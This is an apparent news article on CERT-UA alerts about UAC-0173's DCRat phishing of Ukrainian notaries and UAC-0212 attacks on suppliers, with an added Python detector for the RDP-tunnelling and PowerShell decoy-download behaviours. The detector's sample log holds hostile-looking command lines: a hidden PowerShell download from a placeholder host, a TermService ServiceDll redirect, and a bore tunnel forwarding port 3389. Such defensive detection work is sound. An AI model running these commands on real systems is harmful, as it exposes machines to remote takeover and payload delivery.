The Computer Emergency Response Team of Ukraine (CERT-UA) has issued an alert concerning a resurgence in cyber activity from the organized criminal group known as UAC-0173. This group is reportedly employing a remote access trojan called DCRat (also referred to as DarkCrystal RAT) to infiltrate systems.
This recent campaign, which emerged around mid-January 2025, specifically targets notaries in Ukraine. The lure is a phishing email impersonating the Ukrainian Ministry of Justice that urges the recipient to download an executable file, which in turn installs the DCRat malware. The payload is hosted on Cloudflare's R2 cloud storage service, showing the group abusing a legitimate cloud provider to distribute malware.
Upon gaining access, the attackers deploy additional tools, notably RDPWRAPPER. This utility allows additional remote desktop protocol (RDP) sessions on the host; combined with the BORE tunnelling utility, it lets the attackers open direct RDP connections from the internet to the compromised system. CERT-UA noted that this method strengthens the adversary's control over the victim's automated workplace.
Moreover, the attackers use tools such as FIDDLER to capture authentication data for state registries, and NMAP for network reconnaissance. They also deploy XWorm to steal sensitive information such as passwords and clipboard contents. These actions map to the MITRE ATT&CK tactics Initial Access, Credential Access, and Execution.
In addition, compromised systems are used to send further malicious emails via the SENDMAIL console utility, extending the reach of the campaign. Such activities underscore the persistent threat posed by these cybercriminals.
In a second campaign, attributed to the group UAC-0212, the attackers execute PowerShell commands that display a decoy file while simultaneously delivering additional malicious payloads, including SECONDBEST (EMPIREPAST), SPARK, and a Golang loader dubbed CROOKBAG. These techniques fall under the MITRE ATT&CK tactics Execution and Defense Evasion.
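A defender-side illustration of two behaviours described above, the RDPWRAPPER plus BORE exposure of RDP and the PowerShell "show a decoy, fetch a payload" pattern. This is an added example, not code or detection content from CERT-UA's alerts. It scans constructed process-creation log lines (the pipe-separated format, hostname, file names and URL are all made up here) and flags three indicators: a reference to the RDP Wrapper installer or its rdpwrap.dll, a redirection of the TermService ServiceDll registry value (the mechanism RDP Wrapper uses, assumed here to be visible as a reg.exe command), and a bore client forwarding local port 3389 to a public relay. A final helper correlates the RDP indicators per host.

```python
import re
from dataclasses import dataclass


@dataclass
class Event:
    ts: str
    host: str
    parent: str
    image: str
    cmdline: str


@dataclass
class Finding:
    ts: str
    host: str
    rule: str
    evidence: str


# Constructed sample of process-creation events; not telemetry from the CERT-UA alert.
# Fields: timestamp|host|parent image|image|command line. Host, file names and URL are placeholders.
SAMPLE_LOG = (
    "2025-01-20T09:12:01Z|WS-NOTARY-07|explorer.exe|powershell.exe|"
    "powershell -w hidden -c \"Start-Process .\\Dodatok.pdf; "
    "Invoke-WebRequest -Uri https://r2-placeholder.invalid/x -OutFile x.exe\"\n"
    "2025-01-20T09:12:44Z|WS-NOTARY-07|powershell.exe|RDPWInst.exe|RDPWInst.exe -i\n"
    "2025-01-20T09:12:45Z|WS-NOTARY-07|RDPWInst.exe|reg.exe|reg add "
    "HKLM\\SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters /v ServiceDll "
    "/t REG_EXPAND_SZ /d \"C:\\Program Files\\RDP Wrapper\\rdpwrap.dll\" /f\n"
    "2025-01-20T09:13:10Z|WS-NOTARY-07|powershell.exe|bore.exe|bore local 3389 --to bore.pub\n"
    "2025-01-20T09:15:00Z|WS-NOTARY-07|explorer.exe|notepad.exe|notepad.exe C:\\Users\\n\\contract.txt\n"
    "2025-01-20T09:16:00Z|WS-NOTARY-07|services.exe|svchost.exe|svchost.exe -k NetworkService -s TermService\n"
)

RDPWRAP_RE = re.compile(r"rdpwrap|rdpwinst", re.I)
TERMSERVICE_DLL_RE = re.compile(r"TermService\\Parameters.*\bServiceDll\b", re.I)
BORE_3389_RE = re.compile(r"\blocal\s+3389\b", re.I)
PS_DOWNLOAD_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I)
PS_OPEN_DECOY_RE = re.compile(r"Start-Process|Invoke-Item", re.I)
PS_HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)


def parse_events(text):
    """Parse the constructed pipe-separated format; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        parts = line.split("|", 4)
        if len(parts) == 5:
            events.append(Event(*parts))
    return events


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def rule_rdpwrapper(ev):
    # Either the installer/DLL is named directly, or the TermService service DLL is redirected.
    if RDPWRAP_RE.search(basename(ev.image)) or RDPWRAP_RE.search(ev.cmdline):
        return "RDP Wrapper binary or DLL referenced"
    if TERMSERVICE_DLL_RE.search(ev.cmdline):
        return "TermService ServiceDll being redirected"
    return None


def rule_bore_tunnel(ev):
    # bore exposing the local RDP port through a public relay; this is what gives internet-facing RDP.
    if basename(ev.image) in ("bore", "bore.exe") and BORE_3389_RE.search(ev.cmdline):
        return "bore forwarding local RDP port 3389 to a public relay"
    return None


def rule_ps_decoy_download(ev):
    # Heuristic: one PowerShell command that both opens a file (the decoy) and downloads content.
    if basename(ev.image) not in ("powershell.exe", "pwsh.exe"):
        return None
    if PS_DOWNLOAD_RE.search(ev.cmdline) and PS_OPEN_DECOY_RE.search(ev.cmdline):
        hidden = " (hidden window)" if PS_HIDDEN_RE.search(ev.cmdline) else ""
        return "PowerShell opens a file and downloads content in one command" + hidden
    return None


RULES = [
    ("ps_decoy_then_download", rule_ps_decoy_download),
    ("rdpwrapper", rule_rdpwrapper),
    ("bore_rdp_tunnel", rule_bore_tunnel),
]


def scan(log_text):
    """Run every rule over every event; return findings in log order."""
    findings = []
    for ev in parse_events(log_text):
        for name, rule in RULES:
            why = rule(ev)
            if why:
                findings.append(Finding(ev.ts, ev.host, name, why))
    return findings


def hosts_with_exposed_rdp(findings):
    """Hosts where both RDP indicators co-occur: extra sessions enabled and port 3389 tunnelled out."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f.host, set()).add(f.rule)
    return {h for h, rules in by_host.items() if {"rdpwrapper", "bore_rdp_tunnel"} <= rules}


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for f in found:
        print(f"{f.ts} {f.host} [{f.rule}] {f.evidence}")
    print("hosts with internet-exposed RDP:", sorted(hosts_with_exposed_rdp(found)))
```

The benign svchost.exe line that hosts the real TermService is deliberately included and is not flagged: the RDP Wrapper rule keys on the ServiceDll value being rewritten, not on the service name alone, which keeps the rule from firing on every normal Remote Desktop host.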
The UAC-0212 group’s activities reportedly targeted suppliers in Serbia, the Czech Republic, and Ukraine from July 2024 to February 2025, with more than two dozen Ukrainian enterprises specializing in automation control systems, electrical services, and freight transportation among the victims. This highlights the rampant targeting of critical infrastructure and service providers across multiple sectors.
Reports from organizations like StrikeReady Labs and Microsoft have documented these attacks, indicating a coordinated effort by the Sandworm subgroup, which Microsoft has identified under the name BadPilot. The evolving nature of these threats demands vigilance and a multifaceted approach to cybersecurity, emphasizing the necessity for robust defenses against sophisticated cyber adversaries.